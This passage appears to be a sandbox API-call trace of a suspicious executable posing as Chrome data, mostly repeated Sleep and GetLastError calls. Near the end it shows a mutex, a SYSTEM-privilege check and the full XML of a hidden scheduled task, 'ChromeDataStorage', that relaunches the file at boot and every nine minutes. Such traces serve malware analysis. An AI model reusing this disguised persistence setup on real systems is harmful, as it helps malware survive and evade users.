	[0094.817] GetLastError () returned 0x0
	[0094.817] Sleep (dwMilliseconds=0x1) 
	[0094.833] GetLastError () returned 0x0
	[0094.833] Sleep (dwMilliseconds=0x1) 
	[0094.850] GetLastError () returned 0x0
	[0094.850] Sleep (dwMilliseconds=0x1) 
	[0094.865] GetLastError () returned 0x0
	[0094.865] Sleep (dwMilliseconds=0x1) 
	[0094.880] GetLastError () returned 0x0
	[0094.880] Sleep (dwMilliseconds=0x1) 
	[0094.897] GetLastError () returned 0x0
	[0094.897] Sleep (dwMilliseconds=0x1) 
	[0094.911] GetLastError () returned 0x0
	[0094.911] Sleep (dwMilliseconds=0x1) 
	[0094.927] GetLastError () returned 0x0
	[0094.927] Sleep (dwMilliseconds=0x1) 
	[0094.942] GetLastError () returned 0x0
	[0094.942] Sleep (dwMilliseconds=0x1) 
	[0094.958] GetLastError () returned 0x0
	[0094.958] Sleep (dwMilliseconds=0x1) 
	[0094.974] GetLastError () returned 0x0
	[0094.974] Sleep (dwMilliseconds=0x1) 
	[0094.989] GetLastError () returned 0x0
	[0094.989] Sleep (dwMilliseconds=0x1) 
	[0095.005] GetLastError () returned 0x0
	[0095.005] Sleep (dwMilliseconds=0x1) 
	[0095.020] GetLastError () returned 0x0
	[0095.020] Sleep (dwMilliseconds=0x1) 
	[0095.036] GetLastError () returned 0x0
	[0095.036] Sleep (dwMilliseconds=0x1) 
	[0095.053] GetLastError () returned 0x0
	[0095.053] Sleep (dwMilliseconds=0x1) 
	[0095.067] GetLastError () returned 0x0
	[0095.067] Sleep (dwMilliseconds=0x1) 
	[0095.083] GetLastError () returned 0x0
	[0095.083] Sleep (dwMilliseconds=0x1) 
	[0095.098] GetLastError () returned 0x0
	[0095.098] Sleep (dwMilliseconds=0x1) 
	[0095.114] GetLastError () returned 0x0
	[0095.114] Sleep (dwMilliseconds=0x1) 
	[0095.129] GetLastError () returned 0x0
	[0095.129] Sleep (dwMilliseconds=0x1) 
	[0095.145] GetLastError () returned 0x0
	[0095.145] Sleep (dwMilliseconds=0x1) 
	[0095.161] GetLastError () returned 0x0
	[0095.161] Sleep (dwMilliseconds=0x1) 
	[0095.176] GetLastError () returned 0x0
	[0095.176] Sleep (dwMilliseconds=0x1) 
	[0095.196] GetLastError () returned 0x0
	[0095.196] Sleep (dwMilliseconds=0x1) 
	[0095.207] GetLastError () returned 0x0
	[0095.208] Sleep (dwMilliseconds=0x1) 
	[0095.223] GetLastError () returned 0x0
	[0095.224] Sleep (dwMilliseconds=0x1) 
	[0095.239] GetLastError () returned 0x0
	[0095.239] Sleep (dwMilliseconds=0x1) 
	[0095.254] GetLastError () returned 0x0
	[0095.254] Sleep (dwMilliseconds=0x1) 
	[0095.271] GetLastError () returned 0x0
	[0095.271] Sleep (dwMilliseconds=0x1) 
	[0095.285] GetLastError () returned 0x0
	[0095.285] Sleep (dwMilliseconds=0x1) 
	[0095.301] GetLastError () returned 0x0
	[0095.301] Sleep (dwMilliseconds=0x1) 
	[0095.317] GetLastError () returned 0x0
	[0095.317] Sleep (dwMilliseconds=0x1) 
	[0095.333] GetLastError () returned 0x0
	[0095.333] Sleep (dwMilliseconds=0x1) 
	[0095.348] GetLastError () returned 0x0
	[0095.348] Sleep (dwMilliseconds=0x1) 
	[0095.363] GetLastError () returned 0x0
	[0095.363] Sleep (dwMilliseconds=0x1) 
	[0095.380] GetLastError () returned 0x0
	[0095.380] Sleep (dwMilliseconds=0x1) 
	[0095.397] GetLastError () returned 0x0
	[0095.397] Sleep (dwMilliseconds=0x1) 
	[0095.410] GetLastError () returned 0x0
	[0095.410] Sleep (dwMilliseconds=0x1) 
	[0095.426] GetLastError () returned 0x0
	[0095.426] Sleep (dwMilliseconds=0x1) 
	[0095.442] GetLastError () returned 0x0
	[0095.442] Sleep (dwMilliseconds=0x1) 
	[0095.457] GetLastError () returned 0x0
	[0095.457] Sleep (dwMilliseconds=0x1) 
	[0095.473] GetLastError () returned 0x0
	[0095.473] Sleep (dwMilliseconds=0x1) 
	[0095.488] GetLastError () returned 0x0
	[0095.488] Sleep (dwMilliseconds=0x1) 
	[0095.504] GetLastError () returned 0x0
	[0095.504] Sleep (dwMilliseconds=0x1) 
	[0095.519] GetLastError () returned 0x0
	[0095.519] Sleep (dwMilliseconds=0x1) 
	[0095.535] GetLastError () returned 0x0
	[0095.535] Sleep (dwMilliseconds=0x1) 
	[0095.551] GetLastError () returned 0x0
	[0095.551] Sleep (dwMilliseconds=0x1) 
	[0095.579] GetLastError () returned 0x0
	[0095.579] Sleep (dwMilliseconds=0x1) 
	[0095.582] GetLastError () returned 0x0
	[0095.582] Sleep (dwMilliseconds=0x1) 
	[0095.598] GetLastError () returned 0x0
	[0095.598] Sleep (dwMilliseconds=0x1) 
	[0095.613] GetLastError () returned 0x0
	[0095.613] Sleep (dwMilliseconds=0x1) 
	[0095.629] GetLastError () returned 0x0
	[0095.629] Sleep (dwMilliseconds=0x1) 
	[0095.644] GetLastError () returned 0x0
	[0095.644] Sleep (dwMilliseconds=0x1) 
	[0095.661] GetLastError () returned 0x0
	[0095.661] Sleep (dwMilliseconds=0x1) 
	[0095.676] GetLastError () returned 0x0
	[0095.676] Sleep (dwMilliseconds=0x1) 
	[0095.691] GetLastError () returned 0x0
	[0095.691] Sleep (dwMilliseconds=0x1) 
	[0095.712] GetLastError () returned 0x0
	[0095.713] Sleep (dwMilliseconds=0x1) 
	[0095.722] GetLastError () returned 0x0
	[0095.722] Sleep (dwMilliseconds=0x1) 
	[0095.738] GetLastError () returned 0x0
	[0095.738] Sleep (dwMilliseconds=0x1) 
	[0095.754] GetLastError () returned 0x0
	[0095.754] Sleep (dwMilliseconds=0x1) 
	[0095.770] GetLastError () returned 0x0
	[0095.770] Sleep (dwMilliseconds=0x1) 
	[0095.785] GetLastError () returned 0x0
	[0095.785] Sleep (dwMilliseconds=0x1) 
	[0095.800] GetLastError () returned 0x0
	[0095.800] Sleep (dwMilliseconds=0x1) 
	[0095.816] GetLastError () returned 0x0
	[0095.816] Sleep (dwMilliseconds=0x1) 
	[0095.832] GetLastError () returned 0x0
	[0095.832] Sleep (dwMilliseconds=0x1) 
	[0095.847] GetLastError () returned 0x0
	[0095.847] Sleep (dwMilliseconds=0x1) 
	[0095.864] GetLastError () returned 0x0
	[0095.864] Sleep (dwMilliseconds=0x1) 
	[0095.880] GetLastError () returned 0x0
	[0095.880] Sleep (dwMilliseconds=0x1) 
	[0095.894] GetLastError () returned 0x0
	[0095.894] Sleep (dwMilliseconds=0x1) 
	[0095.910] GetLastError () returned 0x0
	[0095.910] Sleep (dwMilliseconds=0x1) 
	[0095.925] GetLastError () returned 0x0
	[0095.925] Sleep (dwMilliseconds=0x1) 
	[0095.941] GetLastError () returned 0x0
	[0095.941] Sleep (dwMilliseconds=0x1) 
	[0095.956] GetLastError () returned 0x0
	[0095.956] Sleep (dwMilliseconds=0x1) 
	[0095.972] GetLastError () returned 0x0
	[0095.972] Sleep (dwMilliseconds=0x1) 
	[0095.989] GetLastError () returned 0x0
	[0095.989] Sleep (dwMilliseconds=0x1) 
	[0096.003] GetLastError () returned 0x0
	[0096.003] Sleep (dwMilliseconds=0x1) 
	[0096.019] GetLastError () returned 0x0
	[0096.019] Sleep (dwMilliseconds=0x1) 
	[0096.034] GetLastError () returned 0x0
	[0096.034] Sleep (dwMilliseconds=0x1) 
	[0096.050] GetLastError () returned 0x0
	[0096.050] Sleep (dwMilliseconds=0x1) 
	[0096.069] GetLastError () returned 0x0
	[0096.069] Sleep (dwMilliseconds=0x1) 
	[0096.081] GetLastError () returned 0x0
	[0096.081] Sleep (dwMilliseconds=0x1) 
	[0096.106] GetLastError () returned 0x0
	[0096.107] Sleep (dwMilliseconds=0x1) 
	[0096.112] GetLastError () returned 0x0
	[0096.112] Sleep (dwMilliseconds=0x1) 
	[0096.128] GetLastError () returned 0x0
	[0096.128] Sleep (dwMilliseconds=0x1) 
	[0096.143] GetLastError () returned 0x0
	[0096.143] Sleep (dwMilliseconds=0x1) 
	[0096.159] GetLastError () returned 0x0
	[0096.159] Sleep (dwMilliseconds=0x1) 
	[0096.175] GetLastError () returned 0x0
	[0096.175] Sleep (dwMilliseconds=0x1) 
	[0096.190] GetLastError () returned 0x0
	[0096.190] Sleep (dwMilliseconds=0x1) 
	[0096.206] GetLastError () returned 0x0
	[0096.206] Sleep (dwMilliseconds=0x1) 
	[0096.222] GetLastError () returned 0x0
	[0096.222] Sleep (dwMilliseconds=0x1) 
	[0096.237] GetLastError () returned 0x0
	[0096.237] Sleep (dwMilliseconds=0x1) 
	[0096.253] GetLastError () returned 0x0
	[0096.253] Sleep (dwMilliseconds=0x1) 
	[0096.269] GetLastError () returned 0x0
	[0096.269] Sleep (dwMilliseconds=0x1) 
	[0096.284] GetLastError () returned 0x0
	[0096.284] Sleep (dwMilliseconds=0x1) 
	[0096.299] GetLastError () returned 0x0
	[0096.300] Sleep (dwMilliseconds=0x1) 
	[0096.316] GetLastError () returned 0x0
	[0096.316] Sleep (dwMilliseconds=0x1) 
	[0096.331] GetLastError () returned 0x0
	[0096.331] Sleep (dwMilliseconds=0x1) 
	[0096.347] GetLastError () returned 0x0
	[0096.347] Sleep (dwMilliseconds=0x1) 
	[0096.362] GetLastError () returned 0x0
	[0096.362] Sleep (dwMilliseconds=0x1) 
	[0096.377] GetLastError () returned 0x0
	[0096.378] Sleep (dwMilliseconds=0x1) 
	[0096.393] GetLastError () returned 0x0
	[0096.393] Sleep (dwMilliseconds=0x1) 
	[0096.409] GetLastError () returned 0x0
	[0096.409] Sleep (dwMilliseconds=0x1) 
	[0096.425] GetLastError () returned 0x0
	[0096.425] Sleep (dwMilliseconds=0x1) 
	[0096.440] GetLastError () returned 0x0
	[0096.440] Sleep (dwMilliseconds=0x1) 
	[0096.455] GetLastError () returned 0x0
	[0096.455] Sleep (dwMilliseconds=0x1) 
	[0096.471] GetLastError () returned 0x0
	[0096.471] Sleep (dwMilliseconds=0x1) 
	[0096.487] GetLastError () returned 0x0
	[0096.487] Sleep (dwMilliseconds=0x1) 
	[0096.502] GetLastError () returned 0x0
	[0096.502] Sleep (dwMilliseconds=0x1) 
	[0096.518] GetLastError () returned 0x0
	[0096.518] Sleep (dwMilliseconds=0x1) 
	[0096.534] GetLastError () returned 0x0
	[0096.534] Sleep (dwMilliseconds=0x1) 
	[0096.549] GetLastError () returned 0x0
	[0096.549] Sleep (dwMilliseconds=0x1) 
	[0096.589] GetLastError () returned 0x0
	[0096.589] Sleep (dwMilliseconds=0x1) 
	[0096.596] GetLastError () returned 0x0
	[0096.596] Sleep (dwMilliseconds=0x1) 
	[0096.612] GetLastError () returned 0x0
	[0096.612] Sleep (dwMilliseconds=0x1) 
	[0096.627] GetLastError () returned 0x0
	[0096.627] Sleep (dwMilliseconds=0x1) 
	[0096.643] GetLastError () returned 0x0
	[0096.643] Sleep (dwMilliseconds=0x1) 
	[0096.660] GetLastError () returned 0x0
	[0096.660] Sleep (dwMilliseconds=0x1) 
	[0096.674] GetLastError () returned 0x0
	[0096.674] Sleep (dwMilliseconds=0x1) 
	[0096.689] GetLastError () returned 0x0
	[0096.689] Sleep (dwMilliseconds=0x1) 
	[0096.705] GetLastError () returned 0x0
	[0096.705] Sleep (dwMilliseconds=0x1) 
	[0096.721] GetLastError () returned 0x0
	[0096.721] Sleep (dwMilliseconds=0x1) 
	[0096.736] GetLastError () returned 0x0
	[0096.736] Sleep (dwMilliseconds=0x1) 
	[0096.752] GetLastError () returned 0x0
	[0096.752] Sleep (dwMilliseconds=0x1) 
	[0096.768] GetLastError () returned 0x0
	[0096.768] Sleep (dwMilliseconds=0x1) 
	[0096.793] GetLastError () returned 0x0
	[0096.793] Sleep (dwMilliseconds=0x1) 
	[0096.799] GetLastError () returned 0x0
	[0096.799] Sleep (dwMilliseconds=0x1) 
	[0096.814] GetLastError () returned 0x0
	[0096.814] Sleep (dwMilliseconds=0x1) 
	[0096.830] GetLastError () returned 0x0
	[0096.830] Sleep (dwMilliseconds=0x1) 
	[0096.846] GetLastError () returned 0x0
	[0096.846] Sleep (dwMilliseconds=0x1) 
	[0096.862] GetLastError () returned 0x0
	[0096.862] Sleep (dwMilliseconds=0x1) 
	[0096.877] GetLastError () returned 0x0
	[0096.877] Sleep (dwMilliseconds=0x1) 
	[0096.892] GetLastError () returned 0x0
	[0096.892] Sleep (dwMilliseconds=0x1) 
	[0096.908] GetLastError () returned 0x0
	[0096.908] Sleep (dwMilliseconds=0x1) 
	[0096.924] GetLastError () returned 0x0
	[0096.924] Sleep (dwMilliseconds=0x1) 
	[0096.939] GetLastError () returned 0x0
	[0096.939] Sleep (dwMilliseconds=0x1) 
	[0096.955] GetLastError () returned 0x0
	[0096.955] Sleep (dwMilliseconds=0x1) 
	[0096.971] GetLastError () returned 0x0
	[0096.971] Sleep (dwMilliseconds=0x1) 
	[0096.986] GetLastError () returned 0x0
	[0096.986] Sleep (dwMilliseconds=0x1) 
	[0097.002] GetLastError () returned 0x0
	[0097.002] Sleep (dwMilliseconds=0x1) 
	[0097.017] GetLastError () returned 0x0
	[0097.017] Sleep (dwMilliseconds=0x1) 
	[0097.033] GetLastError () returned 0x0
	[0097.033] Sleep (dwMilliseconds=0x1) 
	[0097.050] GetLastError () returned 0x0
	[0097.050] Sleep (dwMilliseconds=0x1) 
	[0097.067] GetLastError () returned 0x0
	[0097.067] Sleep (dwMilliseconds=0x1) 
	[0097.080] GetLastError () returned 0x0
	[0097.080] Sleep (dwMilliseconds=0x1) 
	[0097.095] GetLastError () returned 0x0
	[0097.095] Sleep (dwMilliseconds=0x1) 
	[0097.112] GetLastError () returned 0x0
	[0097.112] Sleep (dwMilliseconds=0x1) 
	[0097.126] GetLastError () returned 0x0
	[0097.127] Sleep (dwMilliseconds=0x1) 
	[0097.142] GetLastError () returned 0x0
	[0097.142] Sleep (dwMilliseconds=0x1) 
	[0097.157] GetLastError () returned 0x0
	[0097.157] Sleep (dwMilliseconds=0x1) 
	[0097.173] GetLastError () returned 0x0
	[0097.173] Sleep (dwMilliseconds=0x1) 
	[0097.189] GetLastError () returned 0x0
	[0097.189] Sleep (dwMilliseconds=0x1) 
	[0097.204] GetLastError () returned 0x0
	[0097.204] Sleep (dwMilliseconds=0x1) 
	[0097.220] GetLastError () returned 0x0
	[0097.220] Sleep (dwMilliseconds=0x1) 
	[0097.236] GetLastError () returned 0x0
	[0097.236] Sleep (dwMilliseconds=0x1) 
	[0097.251] GetLastError () returned 0x0
	[0097.251] Sleep (dwMilliseconds=0x1) 
	[0097.267] GetLastError () returned 0x0
	[0097.267] Sleep (dwMilliseconds=0x1) 
	[0097.283] GetLastError () returned 0x0
	[0097.283] Sleep (dwMilliseconds=0x1) 
	[0097.299] GetLastError () returned 0x0
	[0097.299] Sleep (dwMilliseconds=0x1) 
	[0097.313] GetLastError () returned 0x0
	[0097.314] Sleep (dwMilliseconds=0x1) 
	[0097.329] GetLastError () returned 0x0
	[0097.329] Sleep (dwMilliseconds=0x1) 
	[0097.345] GetLastError () returned 0x0
	[0097.345] Sleep (dwMilliseconds=0x1) 
	[0097.360] GetLastError () returned 0x0
	[0097.360] Sleep (dwMilliseconds=0x1) 
	[0097.378] GetLastError () returned 0x0
	[0097.379] Sleep (dwMilliseconds=0x1) 
	[0097.392] GetLastError () returned 0x0
	[0097.392] Sleep (dwMilliseconds=0x1) 
	[0097.408] GetLastError () returned 0x0
	[0097.408] Sleep (dwMilliseconds=0x1) 
	[0097.423] GetLastError () returned 0x0
	[0097.423] Sleep (dwMilliseconds=0x1) 
	[0097.444] GetLastError () returned 0x0
	[0097.444] Sleep (dwMilliseconds=0x1) 
	[0097.454] GetLastError () returned 0x0
	[0097.454] Sleep (dwMilliseconds=0x1) 
	[0097.470] GetLastError () returned 0x0
	[0097.470] Sleep (dwMilliseconds=0x1) 
	[0097.485] GetLastError () returned 0x0
	[0097.485] Sleep (dwMilliseconds=0x1) 
	[0097.501] GetLastError () returned 0x0
	[0097.501] Sleep (dwMilliseconds=0x1) 
	[0097.517] GetLastError () returned 0x0
	[0097.517] Sleep (dwMilliseconds=0x1) 
	[0097.532] GetLastError () returned 0x0
	[0097.532] Sleep (dwMilliseconds=0x1) 
	[0097.547] GetLastError () returned 0x0
	[0097.548] Sleep (dwMilliseconds=0x1) 
	[0097.581] GetLastError () returned 0x0
	[0097.581] Sleep (dwMilliseconds=0x1) 
	[0097.594] GetLastError () returned 0x0
	[0097.594] Sleep (dwMilliseconds=0x1) 
	[0097.610] GetLastError () returned 0x0
	[0097.610] Sleep (dwMilliseconds=0x1) 
	[0097.627] GetLastError () returned 0x0
	[0097.627] Sleep (dwMilliseconds=0x1) 
	[0097.641] GetLastError () returned 0x0
	[0097.641] Sleep (dwMilliseconds=0x1) 
	[0097.657] GetLastError () returned 0x0
	[0097.657] Sleep (dwMilliseconds=0x1) 
	[0097.675] GetLastError () returned 0x0
	[0097.675] Sleep (dwMilliseconds=0x1) 
	[0097.688] GetLastError () returned 0x0
	[0097.688] Sleep (dwMilliseconds=0x1) 
	[0097.705] GetLastError () returned 0x0
	[0097.705] Sleep (dwMilliseconds=0x1) 
	[0097.719] GetLastError () returned 0x0
	[0097.719] Sleep (dwMilliseconds=0x1) 
	[0097.735] GetLastError () returned 0x0
	[0097.735] Sleep (dwMilliseconds=0x1) 
	[0097.751] GetLastError () returned 0x0
	[0097.751] Sleep (dwMilliseconds=0x1) 
	[0097.772] GetLastError () returned 0x0
	[0097.772] Sleep (dwMilliseconds=0x1) 
	[0097.782] GetLastError () returned 0x0
	[0097.782] Sleep (dwMilliseconds=0x1) 
	[0097.811] GetLastError () returned 0x0
	[0097.811] Sleep (dwMilliseconds=0x1) 
	[0097.812] GetLastError () returned 0x0
	[0097.813] Sleep (dwMilliseconds=0x1) 
	[0097.828] GetLastError () returned 0x0
	[0097.828] Sleep (dwMilliseconds=0x1) 
	[0097.844] GetLastError () returned 0x0
	[0097.844] Sleep (dwMilliseconds=0x1) 
	[0097.859] GetLastError () returned 0x0
	[0097.859] Sleep (dwMilliseconds=0x1) 
	[0097.875] GetLastError () returned 0x0
	[0097.875] Sleep (dwMilliseconds=0x1) 
	[0097.892] GetLastError () returned 0x0
	[0097.892] Sleep (dwMilliseconds=0x1) 
	[0097.906] GetLastError () returned 0x0
	[0097.906] Sleep (dwMilliseconds=0x1) 
	[0097.922] GetLastError () returned 0x0
	[0097.922] Sleep (dwMilliseconds=0x1) 
	[0097.937] GetLastError () returned 0x0
	[0097.937] Sleep (dwMilliseconds=0x1) 
	[0097.953] GetLastError () returned 0x0
	[0097.953] Sleep (dwMilliseconds=0x1) 
	[0097.969] GetLastError () returned 0x0
	[0097.969] Sleep (dwMilliseconds=0x1) 
	[0097.984] GetLastError () returned 0x0
	[0097.984] Sleep (dwMilliseconds=0x1) 
	[0098.000] GetLastError () returned 0x0
	[0098.000] Sleep (dwMilliseconds=0x1) 
	[0098.015] GetLastError () returned 0x0
	[0098.015] Sleep (dwMilliseconds=0x1) 
	[0098.031] GetLastError () returned 0x0
	[0098.031] Sleep (dwMilliseconds=0x1) 
	[0098.047] GetLastError () returned 0x0
	[0098.047] Sleep (dwMilliseconds=0x1) 
	[0098.063] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x129510, nSize=0x200 | out: lpFilename="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe")) returned 0x3d
	[0098.063] Sleep (dwMilliseconds=0x1) 
	[0098.078] PathRemoveFileSpecW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata") returned 1
	[0098.078] Sleep (dwMilliseconds=0x1) 
	[0098.095] PathAddBackslashW (in: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata" | out: pszPath="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\") returned=""
	[0098.095] GetProcessHeap () returned 0x1d0000
	[0098.095] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x110) returned 0x218cc0
	[0098.095] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x218cc0, nSize=0x104 | out: lpFilename="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata\\tadiapce.exe")) returned 0x3d
	[0098.095] SetCurrentDirectoryW (lpPathName="C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\" (normalized: "c:\\users\\2xc7u663gxwc\\appdata\\roaming\\chromedata")) returned 1
	[0098.096] RtlAddVectoredExceptionHandler (FirstHandler=0x0, VectoredHandler=0xd73370) returned 0x20a158
	[0098.096] ConvertStringSecurityDescriptorToSecurityDescriptorW () returned 0x1
	[0098.098] GetWindowsDirectoryW (in: lpBuffer=0x129118, uSize=0x208 | out: lpBuffer="C:\\Windows") returned 0xa
	[0098.098] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x0, nVolumeNameSize=0x0, lpVolumeSerialNumber=0x129408, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer=0x0, lpVolumeSerialNumber=0x129408*=0x64285303, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1
	[0098.098] CreateMutexW (lpMutexAttributes=0x1294ec, bInitialOwner=1, lpName="Global\\C850A606981932960") returned 0x8
	[0098.098] LocalFree (hMem=0x211118) returned 0x0
	[0098.098] GetLastError () returned 0x0
	[0098.099] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0
	[0098.100] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0098.104] GetCurrentProcess () returned 0xffffffff
	[0098.104] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x8, TokenHandle=0x1294f4 | out: TokenHandle=0x1294f4*=0x218) returned 1
	[0098.104] GetTokenInformation (in: TokenHandle=0x218, TokenInformationClass=0x1, TokenInformation=0x12949c, TokenInformationLength=0x4c, ReturnLength=0x1294f0 | out: TokenInformation=0x12949c, ReturnLength=0x1294f0) returned 1
	[0098.104] AllocateAndInitializeSid (in: pIdentifierAuthority=0x1294e8, nSubAuthorityCount=0x1, nSubAuthority0=0x12, nSubAuthority1=0x0, nSubAuthority2=0x0, nSubAuthority3=0x0, nSubAuthority4=0x0, nSubAuthority5=0x0, nSubAuthority6=0x0, nSubAuthority7=0x0, pSid=0x1294f8 | out: pSid=0x1294f8*=0x1eca40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
	[0098.104] EqualSid (pSid1=0x1294a4*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12), pSid2=0x1eca40*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x12)) returned 1
	[0098.104] CloseHandle (hObject=0x218) returned 1
	[0098.104] RtlAllocateHeap (HeapHandle=0x1d0000, Flags=0x8, Size=0x400) returned 0x20eea8
	[0098.104] GetVersion () returned 0x1db10106
	[0098.105] CoCreateInstance (in: rclsid=0xd86b74*(Data1=0xf87369f, Data2=0xa4e5, Data3=0x4cfc, Data4=([0]=0xbd, [1]=0x3e, [2]=0x73, [3]=0xe6, [4]=0x15, [5]=0x45, [6]=0x72, [7]=0xdd)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xd86c38*(Data1=0x2faba4c7, Data2=0x4da9, Data3=0x4013, Data4=([0]=0x96, [1]=0x97, [2]=0x20, [3]=0xcc, [4]=0x3f, [5]=0xd4, [6]=0xf, [7]=0x85)), ppv=0xd86b58 | out: ppv=0xd86b58*=0x632690) returned 0x0
	[0098.110] TaskScheduler:ITaskService:Connect (This=0x632690, serverName=0x129168*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), user=0x129178*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), domain=0x129188*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0), password=0x129198*(varType=0x0, wReserved1=0x0, wReserved2=0x0, wReserved3=0x0, varVal1=0x0, varVal2=0x0)) returned 0x0
	[0098.112] TaskScheduler:ITaskService:GetFolder (in: This=0x632690, Path=0x0, ppFolder=0x1294f0 | out: ppFolder=0x1294f0*=0x632298) returned 0x0
	[0098.115] ITaskFolder:GetTasks (in: This=0x632298, flags=1, ppTasks=0x129188 | out: ppTasks=0x129188*=0x6322c8) returned 0x0
	[0098.121] IRegisteredTaskCollection:get_Count (in: This=0x6322c8, pCount=0x129178 | out: pCount=0x129178*=3) returned 0x0
	[0098.122] IRegisteredTaskCollection:get_Item (in: This=0x6322c8, index=0x12907c*(varType=0x3, wReserved1=0x63, wReserved2=0x0, wReserved3=0x0, varVal1=0x1, varVal2=0x0), ppRegisteredTask=0x129180 | out: ppRegisteredTask=0x129180*=0x632340) returned 0x0
	[0098.122] IRegisteredTask:get_Name (in: This=0x632340, pName=0x129184 | out: pName=0x129184*="ChromeDataStorage") returned 0x0
	[0098.122] IRegisteredTask:get_Xml (in: This=0x632340, pXml=0x12918c | out: pXml=0x12918c*="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0.0</Version>\r\n    <Author>AuthorName</Author>\r\n    <Description>Chrome Data Storage</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT9M</Interval>\r\n        <Duration>P415DT14H23M</Duration>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2019-05-14T15:31:33</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n      <UserId>SYSTEM</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      <StopOnIdleEnd>true</StopOnIdleEnd>\r\n      <RestartOnIdle>false</RestartOnIdle>\r\n    </IdleSettings>\r\n    <AllowStartOnDemand>true</AllowStartOnDemand>\r\n    <Enabled>true</Enabled>\r\n    <Hidden>true</Hidden>\r\n    <RunOnlyIfIdle>false</RunOnlyIfIdle>\r\n    <WakeToRun>false</WakeToRun>\r\n    <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>\r\n  </Settings>\r\n  <Actions Context=\"Author\">\r\n    <Exec>\r\n      <Command>C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\tadiapce.exe</Command>\r\n    </Exec>\r\n  </Actions>\r\n</Task>") returned 0x0
	[0098.133] StrStrIW (lpFirst="<?xml version=\"1.0\" encoding=\"UTF-16\"?>\r\n<Task version=\"1.2\" xmlns=\"http://schemas.microsoft.com/windows/2004/02/mit/task\">\r\n  <RegistrationInfo>\r\n    <Version>1.0.0</Version>\r\n    <Author>AuthorName</Author>\r\n    <Description>Chrome Data Storage</Description>\r\n  </RegistrationInfo>\r\n  <Triggers>\r\n    <BootTrigger>\r\n      <Enabled>true</Enabled>\r\n    </BootTrigger>\r\n    <TimeTrigger>\r\n      <Repetition>\r\n        <Interval>PT9M</Interval>\r\n        <Duration>P415DT14H23M</Duration>\r\n        <StopAtDurationEnd>false</StopAtDurationEnd>\r\n      </Repetition>\r\n      <StartBoundary>2019-05-14T15:31:33</StartBoundary>\r\n      <Enabled>true</Enabled>\r\n    </TimeTrigger>\r\n  </Triggers>\r\n  <Principals>\r\n    <Principal id=\"Author\">\r\n      <RunLevel>HighestAvailable</RunLevel>\r\n      <UserId>SYSTEM</UserId>\r\n    </Principal>\r\n  </Principals>\r\n  <Settings>\r\n    <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>\r\n    <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>\r\n    <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>\r\n    <AllowHardTerminate>false</AllowHardTerminate>\r\n    <StartWhenAvailable>true</StartWhenAvailable>\r\n    <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>\r\n    <IdleSettings>\r\n      